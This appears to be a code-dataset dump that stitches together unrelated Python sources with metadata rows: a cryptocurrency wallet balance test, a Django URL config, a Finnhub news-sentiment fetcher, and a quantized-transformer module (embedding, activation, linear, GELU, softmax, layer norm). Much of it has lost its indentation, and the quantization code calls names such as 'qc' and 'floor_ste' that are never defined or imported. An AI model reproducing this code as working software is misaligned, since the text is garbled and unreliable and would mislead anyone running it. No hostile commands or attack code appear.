raw_tx = node.createrawtransaction(inputs, outputs, 0, True)
raw_tx = node.signrawtransactionwithwallet(raw_tx)
assert_equal(raw_tx['complete'], True)
txs.append(raw_tx)
return txs
class WalletTest(BitRubTestFramework):
def set_test_params(self):
self.num_nodes = 2
self.setup_clean_chain = True
self.extra_args = [
['-limitdescendantcount=3'],
[],
]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def run_test(self):
self.nodes[0].importaddress(ADDRESS_WATCHONLY)
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
self.log.info("Check that only node 0 is watching an address")
assert 'watchonly' in self.nodes[0].getbalances()
assert 'watchonly' not in self.nodes[1].getbalances()
self.log.info("Mining blocks ...")
self.nodes[0].generate(1)
self.sync_all()
self.nodes[1].generate(1)
self.nodes[1].generatetoaddress(101, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getwalletinfo()['balance'], 50)
assert_equal(self.nodes[1].getbalances()['mine']['trusted'], 50)
assert_equal(self.nodes[0].getbalances()['watchonly']['immature'], 5000)
assert 'watchonly' not in self.nodes[1].getbalances()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
self.log.info("Test getbalance with different arguments")
assert_equal(self.nodes[0].getbalance("*"), 50)
assert_equal(self.nodes[0].getbalance("*", 1), 50)
assert_equal(self.nodes[0].getbalance("*", 1, True), 100)
assert_equal(self.nodes[0].getbalance(minconf=1), 50)
assert_equal(self.nodes[0].getbalance(minconf=0, include_watchonly=True), 100)
assert_equal(self.nodes[1].getbalance(minconf=0, include_watchonly=True), 50)
# Send 40 BTR from 0 to 1 and 60 BTR from 1 to 0.
txs = create_transactions(self.nodes[0], self.nodes[1].getnewaddress(), 40, [Decimal('0.01')])
self.nodes[0].sendrawtransaction(txs[0]['hex'])
self.nodes[1].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), 60, [Decimal('0.01'), Decimal('0.02')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[0].sendrawtransaction(txs[0]['hex']) # sending on both nodes is faster than waiting for propagation
self.sync_all()
# First argument of getbalance must be set to "*"
assert_raises_rpc_error(-32, "dummy first argument must be excluded or set to \"*\"", self.nodes[1].getbalance, "")
self.log.info("Test getbalance and getunconfirmedbalance with unconfirmed inputs")
# Before `test_balance()`, we have had two nodes with a balance of 50
# each and then we:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 60 from node B to node A with fee 0.01
#
# Then we check the balances:
#
# 1) As is
# 2) With transaction 2 from above with 2x the fee
#
# Prior to #16766, in this situation, the node would immediately report
# a balance of 30 on node B as unconfirmed and trusted.
#
# After #16766, we show that balance as unconfirmed.
#
# The balance is indeed "trusted" and "confirmed" insofar as removing
# the mempool transactions would return at least that much money. But
# the algorithm after #16766 marks it as unconfirmed because the 'taint'
            # tracking of transaction trust for summing balances doesn't consider
            # which inputs belong to a user. In this case, the change output in
            # question could be "destroyed" by replace the 1st transaction above.
            #
            # The post #16766 behavior is correct; we shouldn't be treating those
            # funds as confirmed. If you want to rely on that specific UTXO existing
            # which has given you that balance, you cannot, as a third party
# spending the other input would destroy that unconfirmed.
#
# For example, if the test transactions were:
#
# 1) Sent 40 from node A to node B with fee 0.01
# 2) Sent 10 from node B to node A with fee 0.01
#
# Then our node would report a confirmed balance of 40 + 50 - 10 = 80
# BTR, which is more than would be available if transaction 1 were
# replaced.
def test_balances(*, fee_node_1=0):
# getbalance without any arguments includes unconfirmed transactions, but not untrusted transactions
assert_equal(self.nodes[0].getbalance(), Decimal('9.99')) # change from node 0's send
assert_equal(self.nodes[1].getbalance(), Decimal('0'))
# Same with minconf=0
assert_equal(self.nodes[0].getbalance(minconf=0), Decimal('9.99'))
assert_equal(self.nodes[1].getbalance(minconf=0), Decimal('0'))
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
assert_equal(self.nodes[0].getbalance(minconf=1), Decimal('0'))
assert_equal(self.nodes[1].getbalance(minconf=1), Decimal('0'))
# getunconfirmedbalance
assert_equal(self.nodes[0].getunconfirmedbalance(), Decimal('60')) # output of node 1's spend
assert_equal(self.nodes[0].getbalances()['mine']['untrusted_pending'], Decimal('60'))
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], Decimal('60'))
assert_equal(self.nodes[1].getunconfirmedbalance(), Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getbalances()['mine']['untrusted_pending'], Decimal('30') - fee_node_1)
assert_equal(self.nodes[1].getwalletinfo()["unconfirmed_balance"], Decimal('30') - fee_node_1)
test_balances(fee_node_1=Decimal('0.01'))
self.nodes[1].sendrawtransaction(txs[1]['hex'])
self.nodes[0].sendrawtransaction(txs[1]['hex'])
self.sync_all()
self.log.info("Test getbalance and getunconfirmedbalance with conflicted unconfirmed inputs")
test_balances(fee_node_1=Decimal('0.02'))
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), Decimal('69.99'))
assert_equal(self.nodes[1].getbalance(), Decimal('29.98'))
# Send total balance away from node 1
txs = create_transactions(self.nodes[1], self.nodes[0].getnewaddress(), Decimal('29.97'), [Decimal('0.01')])
self.nodes[1].sendrawtransaction(txs[0]['hex'])
self.nodes[1].generatetoaddress(2, ADDRESS_WATCHONLY)
self.sync_all()
# getbalance with a minconf incorrectly excludes coins that have been spent more recently than the minconf blocks ago
# TODO: fix getbalance tracking of coin spentness depth
# getbalance with minconf=3 should still show the old balance
assert_equal(self.nodes[1].getbalance(minconf=3), Decimal('0'))
# getbalance with minconf=2 will show the new balance.
assert_equal(self.nodes[1].getbalance(minconf=2), Decimal('0'))
# check mempool transactions count for wallet unconfirmed balance after
# dynamically loading the wallet.
before = self.nodes[1].getunconfirmedbalance()
dst = self.nodes[1].getnewaddress()
self.nodes[1].unloadwallet('')
self.nodes[0].sendtoaddress(dst, 0.1)
self.sync_all()
self.nodes[1].loadwallet('')
after = self.nodes[1].getunconfirmedbalance()
assert_equal(before + Decimal('0.1'), after)
# Create 3 more wallet txs, where the last is not accepted to the
# mempool because it is the third descendant of the tx above
for _ in range(3):
# Set amount high enough such that all coins are spent by each tx
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 99)
self.log.info('Check that wallet txs not in the mempool are untrusted')
assert txid not in self.nodes[0].getrawmempool()
assert_equal(self.nodes[0].gettransaction(txid)['trusted'], False)
assert_equal(self.nodes[0].getbalance(minconf=0), 0)
self.log.info("Test replacement and reorg of non-mempool tx")
tx_orig = self.nodes[0].gettransaction(txid)['hex']
# Increase fee by 1 coin
tx_replace = tx_orig.replace(
struct.pack("<q", 99 * 10**8).hex(),
struct.pack("<q", 98 * 10**8).hex(),
)
tx_replace = self.nodes[0].signrawtransactionwithwallet(tx_replace)['hex']
# Total balance is given by the sum of outputs of the tx
total_amount = sum([o['value'] for o in self.nodes[0].decoderawtransaction(tx_replace)['vout']])
self.sync_all()
self.nodes[1].sendrawtransaction(hexstring=tx_replace, maxfeerate=0)
# Now confirm tx_replace
block_reorg = self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)[0]
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount)
self.log.info('Put txs back into mempool of node 1 (not node 0)')
self.nodes[0].invalidateblock(block_reorg)
self.nodes[1].invalidateblock(block_reorg)
self.sync_blocks()
self.nodes[0].syncwithvalidationinterfacequeue()
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
self.nodes[0].generatetoaddress(1, ADDRESS_WATCHONLY)
assert_equal(self.nodes[0].getbalance(minconf=0), 0) # wallet txs not in the mempool are untrusted
# Now confirm tx_orig
self.restart_node(1, ['-persistmempool=0'])
connect_nodes(self.nodes[0], 1)
sync_blocks(self.nodes)
self.nodes[1].sendrawtransaction(tx_orig)
self.nodes[1].generatetoaddress(1, ADDRESS_WATCHONLY)
self.sync_all()
assert_equal(self.nodes[0].getbalance(minconf=0), total_amount + 1) # The reorg recovered our fee of 1 coin
if __name__ == '__main__':
WalletTest().main()
| true | true |
f719173f8124d167cfa365f834dbc8b7c61362f6 | 247 | py | Python | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | null | null | null | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | 3 | 2021-03-19T01:18:39.000Z | 2021-04-08T19:55:26.000Z | insurance/urls.py | paulohenriquesi/origin_python | f8f824ccda46a66da93e43bb269803b0d0ee7c99 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from api import views
# URL routing table: Django admin, DRF session-auth views, and the
# insurance risk-calculation endpoint served by the api app.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api-auth/', include('rest_framework.urls')),  # DRF login/logout views
    path('riskcalc', views.calculate_risk)  # risk profile calculation endpoint
]
| 24.7 | 54 | 0.716599 | from django.contrib import admin
from django.urls import path, include
from api import views
# URL routing table: Django admin, DRF session-auth views, and the
# insurance risk-calculation endpoint served by the api app.
urlpatterns = [
    path('admin/', admin.site.urls),
    path('api-auth/', include('rest_framework.urls')),  # DRF login/logout views
    path('riskcalc', views.calculate_risk)  # risk profile calculation endpoint
]
| true | true |
f719184d0965b1afb362f1bed12ae11aa08d5a1a | 2,600 | py | Python | gamestonk_terminal/behavioural_analysis/finnhub_view.py | shanedrinion/GamestonkTerminal | baf36aa7c96de6918911c7a263cf5ac9648b27e3 | [
"MIT"
] | 1 | 2021-12-17T19:25:12.000Z | 2021-12-17T19:25:12.000Z | gamestonk_terminal/behavioural_analysis/finnhub_view.py | lolrenx/GamestonkTerminal | eb2b0d766bf1b6bb8656d6733083962efb152fe2 | [
"MIT"
] | 1 | 2021-04-20T00:26:20.000Z | 2021-04-20T00:26:20.000Z | gamestonk_terminal/behavioural_analysis/finnhub_view.py | lolrenx/GamestonkTerminal | eb2b0d766bf1b6bb8656d6733083962efb152fe2 | [
"MIT"
] | null | null | null | import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
    """Get sentiment stats from Finnhub.

    Parameters
    ----------
    ticker : str
        Ticker to get sentiment stats

    Returns
    -------
    Dict
        Sentiment stats payload, or an empty dict on a non-200 response
    """
    response = requests.get(
        f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}",
        # Bug fix: without a timeout a stalled connection hangs the terminal
        # indefinitely; requests has no default timeout.
        timeout=10,
    )
    if response.status_code == 200:
        return response.json()
    return {}
def sentiment_stats(other_args: List[str], ticker: str):
    """Print Finnhub sentiment statistics for ``ticker``.

    Shows buzz, news score, article counts, bullish/bearish percentages and
    the sector averages. [Source: https://finnhub.io]

    Parameters
    ----------
    other_args : List[str]
        Command line arguments to be processed with argparse
    ticker : str
        Ticker to get sentiment stats
    """
    parser = argparse.ArgumentParser(
        add_help=False,
        prog="stats",
        description="""
            Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
            bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
            [Source: https://finnhub.io]
        """,
    )

    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return

        stats = get_sentiment_stats(ticker)
        if not stats:
            # Guard clause: nothing returned by the API for this ticker.
            print("No sentiment stats found.")
            print("")
            return

        print(f"Buzz: {round(100*stats['buzz']['buzz'],2)} %")
        print(f"News Score: {round(100*stats['companyNewsScore'],2)} %")
        print("")

        print(f"Articles Last Week: {stats['buzz']['articlesInLastWeek']}")
        print(f"Articles Weekly Average: {stats['buzz']['weeklyAverage']}")
        print("")

        print(f"Bullish: {round(100*stats['sentiment']['bullishPercent'],2)} %")
        print(f"Bearish: {round(100*stats['sentiment']['bearishPercent'],2)} %")
        print("")

        print(
            f"Sector Average Bullish: {round(100*stats['sectorAverageBullishPercent'],2)} %"
        )
        print(
            f"Sector Average News Score: {round(100*stats['sectorAverageNewsScore'],2)} %"
        )
        print("")

    except Exception as e:
        print(e, "\n")
| 31.325301 | 109 | 0.609231 | import argparse
from typing import List, Dict
import requests
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.helper_funcs import (
parse_known_args_and_warn,
)
def get_sentiment_stats(ticker: str) -> Dict:
    """Fetch Finnhub news-sentiment stats for ``ticker``.

    Returns the decoded JSON payload on HTTP 200, otherwise an empty dict.
    """
    response = requests.get(
        f"https://finnhub.io/api/v1/news-sentiment?symbol={ticker}&token={cfg.API_FINNHUB_KEY}"
    )
    if response.status_code == 200:
        return response.json()
    return {}
def sentiment_stats(other_args: List[str], ticker: str):
    """Print Finnhub sentiment statistics for ``ticker``.

    Shows buzz, news score, article counts, bullish/bearish percentages and
    the sector averages. [Source: https://finnhub.io]

    Parameters
    ----------
    other_args : List[str]
        Command line arguments to be processed with argparse
    ticker : str
        Ticker to get sentiment stats
    """
    parser = argparse.ArgumentParser(
        add_help=False,
        prog="stats",
        description="""
            Sentiment stats which displays buzz, news score, articles last week, articles weekly average,
            bullish vs bearish percentages, sector average bullish percentage, and sector average news score.
            [Source: https://finnhub.io]
        """,
    )
    try:
        ns_parser = parse_known_args_and_warn(parser, other_args)
        if not ns_parser:
            return
        d_stats = get_sentiment_stats(ticker)
        if d_stats:
            # Pretty-print each stat group separated by blank lines.
            print(f"Buzz: {round(100*d_stats['buzz']['buzz'],2)} %")
            print(f"News Score: {round(100*d_stats['companyNewsScore'],2)} %")
            print("")
            print(f"Articles Last Week: {d_stats['buzz']['articlesInLastWeek']}")
            print(f"Articles Weekly Average: {d_stats['buzz']['weeklyAverage']}")
            print("")
            print(f"Bullish: {round(100*d_stats['sentiment']['bullishPercent'],2)} %")
            print(f"Bearish: {round(100*d_stats['sentiment']['bearishPercent'],2)} %")
            print("")
            print(
                f"Sector Average Bullish: {round(100*d_stats['sectorAverageBullishPercent'],2)} %"
            )
            print(
                f"Sector Average News Score: {round(100*d_stats['sectorAverageNewsScore'],2)} %"
            )
        else:
            print("No sentiment stats found.")
        print("")
    except Exception as e:
        # Best-effort CLI handler: report the error and keep the terminal alive.
        print(e, "\n")
| true | true |
f71918615f3a215dc0bc915794b798facde5f6a8 | 22,397 | py | Python | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | qnarre/models/ibert_quant_modules.py | quantapix/qnarre.com | f51d5945c20ef8182c4aa11f1b407d064c190c70 | [
"MIT"
] | null | null | null | import decimal
import numpy as np
import torch
from torch import nn
from torch.autograd import Function
from ...utils import logging
logger = logging.get_logger(__name__)
class QuantEmbedding(qc.Module):
    """Quantization-aware embedding lookup.

    Float mode (``quant_mode=False``): behaves like ``F.embedding`` and
    returns ``(embeddings, None)``.  Quant mode: symmetrically quantizes the
    weight to ``weight_bit`` bits, looks up the integer weights and returns
    ``(dequantized embeddings, weight scaling factor)``.

    NOTE(review): ``qc`` is not imported in this chunk — presumably the
    project's core module providing a Module base class; confirm.
    """

    def __init__(
        self,
        num_embeddings,
        embedding_dim,
        padding_idx=None,
        max_norm=None,
        norm_type=2.0,
        scale_grad_by_freq=False,
        sparse=False,
        _weight=None,
        weight_bit=8,
        momentum=0.95,
        quant_mode=False,
    ):
        super().__init__()
        self.num_ = num_embeddings
        self.dim = embedding_dim
        # Plain nn.Embedding options, forwarded verbatim to F.embedding.
        self.padding_idx = padding_idx
        self.max_norm = max_norm
        self.norm_type = norm_type
        self.scale_grad_by_freq = scale_grad_by_freq
        self.sparse = sparse

        self.weight = nn.Parameter(torch.zeros([num_embeddings, embedding_dim]))
        # Quantization state, refreshed on every quantized forward pass.
        self.register_buffer("weight_scaling_factor", torch.zeros(1))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))

        self.weight_bit = weight_bit
        self.momentum = momentum  # NOTE(review): stored but unused in this chunk
        self.quant_mode = quant_mode
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def forward(self, x, positions=None, incremental_state=None):
        """Return ``(embeddings, scaling_factor)``.

        ``positions`` and ``incremental_state`` are accepted but unused here.
        The scaling factor is None in float mode.
        """
        if not self.quant_mode:
            return (
                F.embedding(
                    x,
                    self.weight,
                    self.padding_idx,
                    self.max_norm,
                    self.norm_type,
                    self.scale_grad_by_freq,
                    self.sparse,
                ),
                None,
            )

        # Symmetric per-tensor range of the weight.
        w = self.weight
        w_transform = w.data.detach()
        w_min = w_transform.min().expand(1)
        w_max = w_transform.max().expand(1)

        self.weight_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, False
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.weight_scaling_factor
        )

        emb_int = F.embedding(
            x,
            self.weight_integer,
            self.padding_idx,
            self.max_norm,
            self.norm_type,
            self.scale_grad_by_freq,
            self.sparse,
        )
        return emb_int * self.weight_scaling_factor, self.weight_scaling_factor
class QuantAct(qc.Module):
    """Tracks activation ranges and (fake-)quantizes activations.

    While training, an exponential moving average of the activation min/max
    is maintained.  In quant mode the forward pass returns the quantized
    activation together with its scaling factor; in float mode it returns
    the activation unchanged and ``None``.

    Parameters
    ----------
    activation_bit : int
        Bit width used for activation quantization.
    act_range_momentum : float
        EMA momentum for the running min/max; ``-1`` means running min/max.
    per_channel : bool
        Must be False — per-channel activations are unsupported.
    channel_len : int, optional
        Unused placeholder kept for interface compatibility.
    quant_mode : bool
        Whether quantization is active.
    """

    def __init__(
        self,
        activation_bit,
        act_range_momentum=0.95,
        per_channel=False,
        channel_len=None,
        quant_mode=False,
    ):
        super().__init__()
        self.activation_bit = activation_bit
        self.act_range_momentum = act_range_momentum
        self.quant_mode = quant_mode
        self.per_channel = per_channel
        self.percentile = False
        self.act_function = SymmetricQuantFunction.apply

        if not self.per_channel:
            self.register_buffer("x_min", torch.zeros(1))
            self.register_buffer("x_max", torch.zeros(1))
            self.register_buffer("act_scaling_factor", torch.zeros(1))
            # Nudge the initial range off exactly zero so the
            # "uninitialized" check in forward() can detect first use.
            self.x_min -= 1e-5
            self.x_max += 1e-5
        else:
            raise NotImplementedError("per-channel mode is not currently supported for activation.")

    def __repr__(self):
        # Bug fix: the original interpolated `self.activation_bit` a second
        # time for the quant_mode field; report the actual quant_mode.
        return (
            f"{self.__class__.__name__}(activation_bit={self.activation_bit}, "
            f"quant_mode: {self.quant_mode}, Act_min: {self.x_min.item():.2f}, "
            f"Act_max: {self.x_max.item():.2f})"
        )

    def forward(
        self,
        x,
        pre_act_scaling_factor=None,
        identity=None,
        identity_scaling_factor=None,
        specified_min=None,
        specified_max=None,
    ):
        """Quantize ``x`` (optionally fused with a residual ``identity``).

        Returns ``(quantized activation, scaling factor)``; the factor is
        None in float mode.
        """
        x_act = x if identity is None else identity + x
        # collect running stats if training
        if self.training:
            assert not self.percentile, "percentile mode is not currently supported for activation."
            assert (
                not self.per_channel
            ), "per-channel mode is not currently supported for activation."
            x_min = x_act.data.min()
            x_max = x_act.data.max()

            assert (
                x_max.isnan().sum() == 0 and x_min.isnan().sum() == 0
            ), "NaN detected when computing min/max of the activation"

            # Initialization: range still at its epsilon starting values.
            if self.x_min.min() > -1.1e-5 and self.x_max.max() < 1.1e-5:
                self.x_min = self.x_min + x_min
                self.x_max = self.x_max + x_max
            # exponential moving average (EMA)
            # use momentum to prevent the quantized values change greatly every iteration
            elif self.act_range_momentum == -1:
                self.x_min = torch.min(self.x_min, x_min)
                self.x_max = torch.max(self.x_max, x_max)
            else:
                self.x_min = self.x_min * self.act_range_momentum + x_min * (
                    1 - self.act_range_momentum
                )
                self.x_max = self.x_max * self.act_range_momentum + x_max * (
                    1 - self.act_range_momentum
                )

        if not self.quant_mode:
            return x_act, None

        x_min = self.x_min if specified_min is None else specified_min
        x_max = self.x_max if specified_max is None else specified_max

        self.act_scaling_factor = symmetric_linear_quantization_params(
            self.activation_bit, x_min, x_max, per_channel=self.per_channel
        )

        if pre_act_scaling_factor is None:
            # this is for the input quantization
            quant_act_int = self.act_function(
                x, self.activation_bit, self.percentile, self.act_scaling_factor
            )
        else:
            # Re-quantize from the previous scale (and fuse the residual).
            quant_act_int = FixedPointMul.apply(
                x,
                pre_act_scaling_factor,
                self.activation_bit,
                self.act_scaling_factor,
                identity,
                identity_scaling_factor,
            )

        correct_output_scale = self.act_scaling_factor.view(-1)

        return quant_act_int * correct_output_scale, self.act_scaling_factor
class QuantLinear(qc.Module):
    """Quantization-aware drop-in for ``nn.Linear``.

    Float mode returns ``(F.linear(x), None)``.  Quant mode quantizes the
    weight (per-tensor or per-channel) and bias, runs the linear layer on
    integer values and returns ``(output, bias scaling factor)``.
    """

    def __init__(
        self,
        in_features,
        out_features,
        bias=True,
        weight_bit=8,
        bias_bit=32,
        per_channel=False,
        quant_mode=False,
    ):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features

        self.weight = nn.Parameter(torch.zeros([out_features, in_features]))
        self.register_buffer("weight_integer", torch.zeros_like(self.weight))
        self.register_buffer("fc_scaling_factor", torch.zeros(self.out_features))
        if bias:
            self.bias = nn.Parameter(torch.zeros(out_features))
            self.register_buffer("bias_integer", torch.zeros_like(self.bias))
        else:
            # Bug fix: the original never defined these when bias=False, so
            # forward() raised AttributeError on `self.bias` / `self.bias_integer`.
            self.register_parameter("bias", None)
            self.bias_integer = None

        self.weight_bit = weight_bit
        self.per_channel = per_channel
        self.bias_bit = bias_bit
        self.quant_mode = quant_mode  # (was assigned twice in the original)
        self.percentile_mode = False
        self.weight_function = SymmetricQuantFunction.apply

    def __repr__(self):
        s = super().__repr__()
        s = f"({s} weight_bit={self.weight_bit}, quant_mode={self.quant_mode})"
        return s

    def forward(self, x, prev_act_scaling_factor=None):
        """Return ``(output, bias_scaling_factor)``; the factor is None in
        float mode."""
        if not self.quant_mode:
            return F.linear(x, weight=self.weight, bias=self.bias), None

        # assert that prev_act_scaling_factor is a scalar tensor
        assert prev_act_scaling_factor is not None and prev_act_scaling_factor.shape == (1,), (
            "Input activation to the QuantLinear layer should be globally (non-channel-wise) quantized. "
            "Please add a QuantAct layer with `per_channel = True` before this QuantAct layer"
        )

        # Weight range: per output channel or per tensor.
        w = self.weight
        w_transform = w.data.detach()
        if self.per_channel:
            w_min, _ = torch.min(w_transform, dim=1, out=None)
            w_max, _ = torch.max(w_transform, dim=1, out=None)
        else:
            w_min = w_transform.min().expand(1)
            w_max = w_transform.max().expand(1)

        self.fc_scaling_factor = symmetric_linear_quantization_params(
            self.weight_bit, w_min, w_max, self.per_channel
        )
        self.weight_integer = self.weight_function(
            self.weight, self.weight_bit, self.percentile_mode, self.fc_scaling_factor
        )

        bias_scaling_factor = self.fc_scaling_factor * prev_act_scaling_factor

        if self.bias is not None:
            self.bias_integer = self.weight_function(
                self.bias, self.bias_bit, False, bias_scaling_factor
            )

        prev_act_scaling_factor = prev_act_scaling_factor.view(1, -1)
        x_int = x / prev_act_scaling_factor

        return (
            F.linear(x_int, weight=self.weight_integer, bias=self.bias_integer)
            * bias_scaling_factor,
            bias_scaling_factor,
        )
class IntGELU(qc.Module):
    """GELU built from an integer second-order polynomial approximation of erf.

    Falls back to ``nn.GELU`` when ``quant_mode`` is False or when
    ``force_dequant`` requests dequantized nonlinearities.
    """

    def __init__(self, quant_mode=True, force_dequant="none"):
        super().__init__()
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "gelu"]:
            logger.info("Force dequantize gelu")
            self.quant_mode = False
        if not self.quant_mode:
            self.activation_fn = nn.GELU()

        self.k = 1.4142  # ~sqrt(2), the erf argument scale in gelu
        self.const = 14  # dummy integer constant
        self.coeff = [-0.2888, -1.769, 1]  # a(x+b)**2 + c
        self.coeff[2] /= self.coeff[0]  # fold c into units of a

    def int_erf(self, x_int, scaling_factor):
        """Integer evaluation of sign(x) * (a(|x|+b)**2 + c) approximating erf."""
        b_int = torch.floor(self.coeff[1] / scaling_factor)
        c_int = torch.floor(self.coeff[2] / scaling_factor**2)
        sign = torch.sign(x_int)

        # Saturate |x| at -b, the vertex of the parabola.
        abs_int = torch.min(torch.abs(x_int), -b_int)
        y_int = sign * ((abs_int + b_int) ** 2 + c_int)
        scaling_factor = scaling_factor**2 * self.coeff[0]

        # avoid overflow
        y_int = floor_ste.apply(y_int / 2**self.const)
        scaling_factor = scaling_factor * 2**self.const

        return y_int, scaling_factor

    def forward(self, x, scaling_factor=None):
        """Return ``(gelu(x), scaling_factor)``; the factor is None in float mode."""
        if not self.quant_mode:
            return self.activation_fn(x), None

        x_int = x / scaling_factor
        sigmoid_int, sigmoid_scaling_factor = self.int_erf(x_int, scaling_factor / self.k)

        # Integer representation of the +1 term in x/2 * (1 + erf(...)).
        shift_int = 1.0 // sigmoid_scaling_factor

        x_int = x_int * (sigmoid_int + shift_int)
        scaling_factor = scaling_factor * sigmoid_scaling_factor / 2

        return x_int * scaling_factor, scaling_factor
class IntSoftmax(qc.Module):
    """Integer-only softmax via a polynomial approximation of exp.

    ``exp(x)`` is decomposed as ``2**(-q) * exp(r)`` with ``x = q*(-ln2) + r``
    and ``exp(r)`` approximated by a second-order polynomial.  Falls back to
    ``F.softmax`` when ``quant_mode`` is False or ``force_dequant`` applies.
    """

    def __init__(self, output_bit, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.output_bit = output_bit
        self.max_bit = 32
        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "softmax"]:
            logger.info("Force dequantize softmax")
            self.quant_mode = False

        self.act = QuantAct(16, quant_mode=self.quant_mode)
        self.x0 = -0.6931  # -ln2
        self.const = 30  # dummy integer constant
        self.coef = [0.35815147, 0.96963238, 1.0]  # ax**2 + bx + c
        self.coef[1] /= self.coef[0]
        self.coef[2] /= self.coef[0]

    def int_polynomial(self, x_int, scaling_factor):
        """Evaluate the quadratic exp approximation on integer inputs."""
        with torch.no_grad():
            b_int = torch.floor(self.coef[1] / scaling_factor)
            c_int = torch.floor(self.coef[2] / scaling_factor**2)
        z = (x_int + b_int) * x_int + c_int
        scaling_factor = self.coef[0] * scaling_factor**2
        return z, scaling_factor

    def int_exp(self, x_int, scaling_factor):
        """Integer approximation of exp for non-positive ``x_int``."""
        with torch.no_grad():
            x0_int = torch.floor(self.x0 / scaling_factor)
        # Clamp the argument so q stays within `const` halvings.
        x_int = torch.max(x_int, self.const * x0_int)

        q = floor_ste.apply(x_int / x0_int)
        r = x_int - x0_int * q
        exp_int, exp_scaling_factor = self.int_polynomial(r, scaling_factor)
        exp_int = torch.clamp(floor_ste.apply(exp_int * 2 ** (self.const - q)), min=0)
        scaling_factor = exp_scaling_factor / 2**self.const
        return exp_int, scaling_factor

    def forward(self, x, scaling_factor):
        """Return ``(softmax(x), output scaling factor)`` along the last dim."""
        if not self.quant_mode:
            return F.softmax(x, dim=-1), None

        x_int = x / scaling_factor

        # Standard max-subtraction for numerical stability.
        x_int_max, _ = x_int.max(dim=-1, keepdim=True)
        x_int = x_int - x_int_max
        exp_int, exp_scaling_factor = self.int_exp(x_int, scaling_factor)

        # Avoid overflow
        exp, exp_scaling_factor = self.act(exp_int, exp_scaling_factor)
        exp_int = exp / exp_scaling_factor

        exp_int_sum = exp_int.sum(dim=-1, keepdim=True)
        factor = floor_ste.apply(2**self.max_bit / exp_int_sum)
        exp_int = floor_ste.apply(exp_int * factor / 2 ** (self.max_bit - self.output_bit))
        scaling_factor = 1 / 2**self.output_bit
        return exp_int * scaling_factor, scaling_factor
class IntLayerNorm(qc.Module):
    """Integer-only LayerNorm over axis 2, with dynamic-shift overflow handling.

    In float mode it performs standard layer normalization with learnable
    ``weight``/``bias``.  In quant mode the variance is accumulated on
    right-shifted integers; if the accumulator would exceed ``max_bit`` during
    training, ``shift`` is enlarged and the variance recomputed.
    """

    def __init__(self, normalized_shape, eps, output_bit=8, quant_mode=False, force_dequant="none"):
        super().__init__()
        self.normalized_shape = normalized_shape
        self.eps = eps

        self.weight = nn.Parameter(torch.zeros(normalized_shape))
        self.bias = nn.Parameter(torch.zeros(normalized_shape))

        self.quant_mode = quant_mode
        if force_dequant in ["nonlinear", "layernorm"]:
            logger.info("Force dequantize layernorm")
            self.quant_mode = False

        self.register_buffer("shift", torch.zeros(1))
        self.output_bit = output_bit
        self.max_bit = 32
        self.dim_sqrt = None  # sqrt(feature dim), lazily computed on first quant pass
        self.activation = QuantAct(self.output_bit, quant_mode=self.quant_mode)

    def set_shift(self, y_int):
        """Grow ``self.shift`` until the shifted variance fits in ``max_bit`` bits."""
        with torch.no_grad():
            y_sq_int = y_int**2
            var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
            shift = (torch.log2(torch.sqrt(var_int / 2**self.max_bit)).ceil()).max()
            shift_old = self.shift
            self.shift = torch.max(self.shift, shift)
            logger.info(f"Dynamic shift adjustment: {int(shift_old)} to {int(self.shift)}")

    def overflow_fallback(self, y_int):
        """Recompute the integer variance after enlarging ``self.shift``."""
        self.set_shift(y_int)  # adjusts `self.shift`
        y_int_shifted = floor_ste.apply(y_int / 2**self.shift)
        y_sq_int = y_int_shifted**2
        var_int = torch.sum(y_sq_int, axis=2, keepdim=True)
        return var_int

